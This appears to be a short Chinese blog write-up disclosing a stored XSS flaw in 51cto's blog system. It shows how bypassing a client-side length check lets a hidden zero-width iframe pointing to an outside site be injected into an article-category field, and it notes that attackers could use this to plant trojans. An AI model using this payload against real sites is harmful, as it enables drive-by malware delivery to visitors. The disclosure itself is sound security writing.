博客系统漏洞解析之xss漏洞 推荐

现在各大门户网站基本都有自己的blog系统，但有不少存在漏洞，本文就以51cto的blog为例，向大家介绍该如何发现和利用漏洞。在发布本文前已经通知了相关人员，漏洞已经补上了。
51cto的blog系统功能很强大，可自定义很多设置，同时也带来了一些安全隐患。在blog系统后台的“文章管理”栏目的“我的文章分类”中，可以添加文章分类，尽管开发者对文章分类的字数有所限制，但只是在客户端进行了鉴别，我们可以想办法通过achilles这款软件抓包后，对数据包进行修改，加入我们要加的代码，如图1所示。



图1
其中666666是我正常提交的文章分类字符，我们将其改为<iframe src="http://www.itheroes.cn" width=0></iframe>，然后再提交。然后再浏览我的blog首页sally.blog.51cto.com，你会发现在打开blog的同时也在打开www.itheroes.cn这个网站，如图2所示。



图2
blog后台的文章分类也变成了图3的形式。



现在破坏者可以给挂了木马的blog起个媚俗的名字，好奇者访问了。